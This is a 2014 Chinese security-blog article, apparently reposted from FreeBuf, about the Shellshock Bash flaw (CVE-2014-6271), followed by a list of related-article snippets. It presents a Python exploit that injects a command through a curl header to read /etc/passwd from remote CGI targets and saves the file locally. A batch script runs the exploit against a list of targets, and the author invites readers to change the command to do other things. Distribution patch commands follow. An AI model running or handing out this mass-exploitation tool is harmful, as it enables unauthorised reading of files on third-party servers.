Bash漏洞批量检测工具与修复方案

标签: 工具 漏洞 CVE ziwen | 发表时间:2014-09-28 16:32 | 作者:ziwen
出处:http://www.freebuf.com

Linux官方内置Bash中新发现一个非常严重 安全漏洞 ,黑客可以利用该Bash漏洞完全控制目标系统并发起攻击。

Bash远程命令执行漏洞(CVE2014-6271)检测脚本

作者:ziwen(dn8.net团队)

运行环境:python 2.7‍

#!/usr/bin/env python
#coding:utf-8
import os
import sys
import re
print "f4ck ziwen cve 2014 6271 exp attacking!"
if sys.argv[1].startswith('-'):
    option = sys.argv[1][1:]
    if option == 'url':
        b=sys.argv[2]
        if not re.match("http",sys.argv[2]):
            print "URL格式错误 正确格式例如http://www.baidu.com/1.cgi"
        
        else:
            out=re.sub("\.|\/","",b)
            out=out[7:]
            print "shahdashhdd",out,b
            a="curl -H \'x: () { :;};a=`/bin/cat /etc/passwd`;echo \"a: $a\"' '"+b+"' -I -o "+out+"\"output\".txt"
            os.system(a)
            f = open(out+"output.txt", 'r')
            a=f.read()
            if re.search("root|bin\/bash",a):
                print "target possible have bug under is *nix passwd file"
                print a
            else:
                f.close()
                os.remove(out+"output.txt")
                print "possible dont have bug! or have a waf!"
    else:
        print "error! U can email to me U question ([email protected])"
        print option

下载地址

脚本会将结果回显出来 如果存在漏洞的话还会把passwd文件保存在以目标域名+output命名的txt文档里,不成功不保存

执行方法

python c:\exp.py -url
 http://23.239.208.105/cgi-bin/poc.cgi

批量检测是否存在Bash远程命令执行漏洞

#!/usr/bin/env python
#coding:utf-8
import os
import sys
PATH=sys.path[0]+"/"
text=open(PATH+"target.txt",'r')
for line in text:
    print line
    os.system("python "+PATH+"exp.py -url "+line)

下载地址

该脚本调用了上面那个EXP 所以请运行该脚本时请将两个脚本放同一目录 并在该目录下新建target.txt文件将您的目标列表放进文件里
如:
http://www.baidu.com
http://23.239.208.105/cgi-bin/poc.cgi
然后运行该脚本即可 该脚本便会自动按顺序检测 会把结果回显出来 并会把成功的目标的passwd文件保存在 以目标域名+output命名的txt文档里,不成功不保存

请不要随意改变exp.py的文件名 如果改变了EXP.PY的文件名请将batch.py里面的exp.py改为您修改的文件名 否则batch.py会运行失败

其他

linux如果用不了上面那个版本请试下这个Linux专版
http://pan.baidu.com/s/1hq7oCYw
windows用不了请试试下面这个windows专版
http://pan.baidu.com/s/1kTmjNKV

如果需要生成其他文件或者利用漏洞做其他事请自行修改脚本中的curl命令
个别报错报CURL命令错误的是CURL版本问题,不是我脚本问题,我这边多个基友都测试了无误

漏洞修复方案

请您根据Linux版本选择您需要修复的命令, 为了防止意外情况发生,建议您执行命令前先对Linux服务器系统盘打个快照,如果万一出现升级影响您服务器使用情况,可以通过回滚系统盘快照解决。  
 
centos:(最终解决方案) 

yum clean all 
yum makecache 
yum -y update bash

ubuntu:(最终解决方案) 

apt-get update 
apt-get -y install --only-upgrade bash

debian:(最终解决方案) 

7.5  64bit && 32bit  

apt-get update 
apt-get -y install --only-upgrade bash

6.0.x 64bit  

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_amd64.deb &&  dpkg -i bash_4.1-3+deb6u2_amd64.deb

6.0.x 32bit  

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_i386.deb &&  dpkg -i bash_4.1-3+deb6u2_i386.deb

aliyun linux:(最终解决方案) 
5.x 64bit  

wget http://mirrors.aliyun.com/centos/5/updates/x86_64/RPMS/bash-3.2-33.el5_10.4.x86_64.rpm && rpm -Uvh bash-3.2-33.el5_10.4.x86_64.rpm

5.x 32bit  

wget http://mirrors.aliyun.com/centos/5/updates/i386/RPMS/bash-3.2-33.el5_10.4.i386.rpm  && rpm -Uvh bash-3.2-33.el5_10.4.i386.rpm

opensuse:(最终解决方案) 

zypper clean 
zypper refresh 
zypper update -y bash

[参考信息来源: http://bbs.aliyun.com/read/176977.html?spm=5176.7189909.3.15.sZTgst,转载请注明来自FreeBuf.COM ]

相关 [bash 漏洞 工具] 推荐:

Bash漏洞批量检测工具与修复方案

- - FreeBuf.COM
Linux官方内置Bash中新发现一个非常严重. 安全漏洞 ,黑客可以利用该Bash漏洞完全控制目标系统并发起攻击. Bash远程命令执行漏洞(CVE2014-6271)检测脚本. 作者:ziwen(dn8.net团队). 运行环境:python 2.7‍ ‍. 脚本会将结果回显出来 如果存在漏洞的话还会把passwd文件保存在以目标域名+output命名的txt文档里,不成功不保存.

Bash远程解析命令执行漏洞测试方法

- - FreeBuf.COM
从昨天开始,这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf,大家都在谈论,“互联网的心脏又出血了”,可是,亲,到底怎么对网站进行测试. 真的如各路大神们说的这样吗. 它与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑信息,而bash 漏洞允许黑客远程控制电脑,拿到系统最高权限.

威胁远胜“心脏出血”?国外新爆Bash高危安全漏洞

- - FreeBuf.COM
这几天Linux用户们可能不能愉快地玩耍了,红帽(Redhat)安全团队昨天爆出一个危险的Bash Shell漏洞. 其带来的威胁可能比早前披露的“心脏出血”漏洞更大更强. [OpenSSL心脏出血漏洞全回顾]  http://www.freebuf.com/articles/network/32171.html.

高效操作Bash

- Eneri - 极限手指
我们在平常工作中大量使用linux, 而使用linux的过程中操作Bash更是非常之频繁, 所以怎样高效的操作Bash是一个非常重要的问题. 下面我结合自己的经验总结一下高效操作Bash的一些技巧. 1 快捷键 1.1 注意. 2 历史扩展 2.1 概念. 2.2 事件指示器(Event Designators).

heartbleed漏洞检查工具集合

- - FreeBuf.COM
4月9日,一个代号“Heartbleed”(意为“心脏出血”)的重大安全漏洞日前被曝光,它能让攻击者从服务器内存中读取包括用户名、密码和信用卡号等隐私信息在内的数据,本文总结了网友开发的Heartbleed漏洞检查工具,如下:. CVE-2014-0160 check Go语言版: Heartbleed.zip  python版:ssltest.py.

bash下利用trap捕捉信号

- Lan - 淘宝共享数据平台 tbdata.org
我在之前的文章里写了myisam读数据压缩的情况,最近决定把它用在生产环境上,所以避免不了写一个“安全”的处理脚本放在DB服务器上,这就引入了本文所讨论的话题. 我希望这个bash脚本在退出的时候做一些事情,包括:. 它启动的切到后台的job需要被杀死;. 在这个脚本里我用到了trap这个命令,关于它,你可以man一下,我这里就不啰嗦了.

处理Apache日志的Bash脚本

- guoan - 阮一峰的网络日志
去年一年,我写了将近100篇网络日志. 现在这一年结束了,我要统计"访问量排名",看看哪些文章最受欢迎. (隆重预告:本文结尾处将揭晓前5名. 以往,我用的是AWStats日志分析软件. 它可以生成很详细的报表,但是不太容易定制,得不到某些想要的信息. 所以,我就决定自己写一个Bash脚本,统计服务器的日志,顺便温习一下脚本知识.

Bash脚本15分钟进阶指导

- - 外刊IT评论网
这里的技术技巧最初是来自谷歌的“Testing on the Toilet” (TOTT). 我的所有bash脚本都以下面几句为开场白:. 这样做会避免两种常见的问题:. 引用未定义的变量(缺省值为“”). 需要注意的是,有些Linux命令的某些参数可以强制忽略发生的错误,例如“mkdir -p” 和 “rm -f”.

Metasploit Framework 4.0发布,开源的安全漏洞检测工具

- Tairan Wang - ITeye资讯频道
Metasploit是一款开源的安全漏洞检测工具,由于是免费的,因此常被安全工作人员用来检测系统的安全性. Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台. 这个框架主要是由Ruby编写的,并带有一些C语言和汇编语言组件.

市面上有哪些安全漏洞扫描工具? - 知乎

- -
AWVS、Nessus、AppScan、Goby、NetSparker、Xray等等一系列. 如果细分的话应当区分web漏扫和主机漏扫. web漏扫:通常需要爬虫爬取网页,先爬取再进行漏洞挖掘. 主机漏扫:则通常使用POC脚本扫描服务端口. web漏扫一般建议使用AWVS配合Xray被动扫描. 主机漏扫的话Goby就很不错了.